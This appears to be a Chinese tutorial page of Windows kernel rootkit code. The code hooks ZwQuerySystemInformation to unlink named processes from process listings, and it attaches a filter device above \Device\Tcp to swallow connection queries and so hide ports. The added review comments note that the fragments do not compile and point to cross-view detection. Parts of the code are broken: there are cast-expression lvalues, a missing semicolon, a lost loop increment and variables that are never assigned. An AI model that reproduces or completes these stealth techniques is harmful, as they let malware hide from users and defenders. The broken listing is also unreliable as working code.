隐藏任意进程,目录/文档,注册表,端口(2)
/*
 * Replacement for ZwQuerySystemInformation installed by this driver.
 *
 * Forwards every call to the saved original (OldZwQuerySystemInformation) and,
 * when the call succeeded and the class is 5 (SystemProcessInformation), walks
 * the returned _SYSTEM_PROCESSES chain and unlinks entries whose name matches
 * an entry in the driver's hide list (list_head entries flagged PTR_HIDEPROC).
 * All other classes and failed calls are passed through untouched.
 *
 * Parameters and return value are those of ZwQuerySystemInformation; rc is the
 * status returned by the original call and is returned unchanged.
 *
 * NOTE(review): this excerpt is not compilable as written — process_name is
 * declared but never assigned here, and the `(char *)curr = ...` forms use a
 * cast expression as an lvalue. Treat the listing as illustrative only.
 * NOTE(review): for defenders, filtering at this layer is the textbook case
 * for cross-view detection (comparing this API's output against an independent
 * enumeration); how the hook is installed is not shown in this excerpt.
 */
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS rc;
/* Only process_name is read below; the other three strings are unused here. */
ANSI_STRING process_name,process_uname,process_name1,process_name2;
/* Local, always TRUE: the filter below is unconditional for class 5. */
BOOL g_hide_proc = TRUE;
CHAR aProcessName[80];
PP_DIR ptr;
int found;
// Call the original ZwQuerySystemInformation first; its result is what gets filtered.
rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation))(SystemInformationClass,
SystemInformation,SystemInformationLength,ReturnLength );
if(NT_SUCCESS(rc ))
{
/* 5 == SystemProcessInformation; other classes are returned as-is. */
if( g_hide_proc && (5 == SystemInformationClass))
{
// View the returned buffer as the first process entry.
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
// Walk the process entries.
while(curr)
{
/* process_name is never filled in from curr in this excerpt. */
if((0 < process_name.Length) && (255 > process_name.Length))
{
found=0;
// Walk the hide list; match is a prefix compare of strlen(ptr->name) bytes.
for(ptr=list_head;ptr!=NULL;ptr=ptr->next )
{
if(ptr->flag != PTR_HIDEPROC) continue ;
if(memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0)
{
found =1;
}
}
// While the current entry matches a hide entry, unlink it and advance.
while(found)
{
if(prev)
{
/* Skip curr by pointing prev at curr's successor. */
if(curr->NextEntryDelta)
{
prev->NextEntryDelta = curr->NextEntryDelta;
}
else
{
prev->NextEntryDelta = 0;
}
}
else
{
/* curr is the head: move the buffer start forward instead. */
if(curr->NextEntryDelta)
{
(char *)SystemInformation = curr->NextEntryDelta;
}
else
{
SystemInformation = NULL;
}
}
/* Advance; a zero delta terminates the chain. */
if(curr->NextEntryDelta)
((char *)curr = curr->NextEntryDelta);
else
{
curr = NULL;break;
}
// Re-check the new current entry against the hide list.
found = 0;
for (ptr=list_head;ptr!=NULL;ptr=ptr->next )
{
if (ptr->flag != PTR_HIDEPROC) continue ;
if (memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0)
{
found = 1;
}
}
}
}
/* Keep the entry and step to the next one. */
if(curr != NULL)
{
prev = curr;
if(curr->NextEntryDelta) ((char *)curr = curr->NextEntryDelta);
else curr = NULL;
}
}
}
}
/* The original status is returned even when entries were removed. */
return(rc);
}
// Port hiding: attach a filter device on top of \Device\Tcp so this driver's
// dispatch routines see the TCP stack's IRPs (see PassThrough below).
//
// NOTE(review): this is a fragment lifted from inside a function — DriverObject,
// FileObject and i are used but not declared here, the `FilterDevice` declaration
// lacks its semicolon, and the for-loop increment appears to have been lost in the
// page text. It is not compilable as shown.
/* Saved so PassThrough can forward IRPs down the stack. */
PDEVICE_OBJECT m_TcpgetDevice;
PDEVICE_OBJECT TcpDevice;
UNICODE_STRING TcpDeviceName;
/* Declared only; never assigned in this excerpt, yet read in the loop below. */
PDRIVER_OBJECT TcpDriver;
PDEVICE_OBJECT TcpgetDevice;
PDEVICE_OBJECT FilterDevice
PDRIVER_DISPATCH Empty;
NTSTATUS status;
/* This driver's IRP_MJ_CREATE handler is used as the "unset" marker below. */
Empty = DriverObject->MajorFunction[IRP_MJ_CREATE];
RtlInitUnicodeString( &TcpDeviceName, L"\\Device\\Tcp");
// Get a pointer to the existing TCP device object (and a file object on it).
status = IoGetDeviceObjectPointer( &TcpDeviceName,FILE_ALL_ACCESS,&FileObject,&TcpDevice);
if(!NT_SUCCESS(status))
{
DbgPrint("IoGetDeviceObjectPointer error!\n");
return status;
}
DbgPrint("IoGetDeviceObjectPointer ok!\n");
// Create the unnamed filter device with a DEVICE_EXTENSION-sized extension.
status = IoCreateDevice( DriverObject,sizeof(DEVICE_EXTENSION),NULL,
FILE_DEVICE_UNKNOWN,0,FALSE,&FilterDevice);
if(!NT_SUCCESS(status))
{
return status;
}
// Attach the filter above the TCP device; the result is the device to forward to.
TcpgetDevice = IoAttachDeviceToDeviceStack( FilterDevice, TcpDevice);
if(!TcpgetDevice)
{
IoDeleteDevice(FilterDevice);
DbgPrint("IoAttachDeviceToDeviceStack error!\n");
/* Reports success even though the attach failed. */
return STATUS_SUCCESS;
}
m_TcpgetDevice = TcpgetDevice;
// For every major function the TCP driver handles that this driver does not,
// route it through PassThrough.
for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i )
{
if((TcpDriver->MajorFunction[i]!=Empty)&&(DriverObject->MajorFunction[i]==Empty))
{
DriverObject->MajorFunction[i] = PassThrough;
}
}
/* Release the file object obtained from IoGetDeviceObjectPointer. */
ObDereferenceObject(FileObject);
NTSTATUS PassThrough( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{
NTSTATUS status;
PIO_STACK_LOCATION pIrpStack;
pIrpStack = IoGetCurrentIrpStackLocation( Irp );
//如是查询则完成 IRP
if ( pIrpStack->Parameters.DeviceIoControl.IoControlCode == QUERY_INFORMATION_EX)
{
//这里能够近一步判断某个端口
Irp->IoStatus.Status=STATUS_SUCCESS;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
//复制当前 IRP
IoCopyCurrentIrpStackLocationToNext(Irp);
IoSetCompletionRoutine( Irp,GenericCompletion,NULL,TRUE,TRUE,TRUE);
//传递
return IoCallDriver( m_TcpgetDevice, Irp);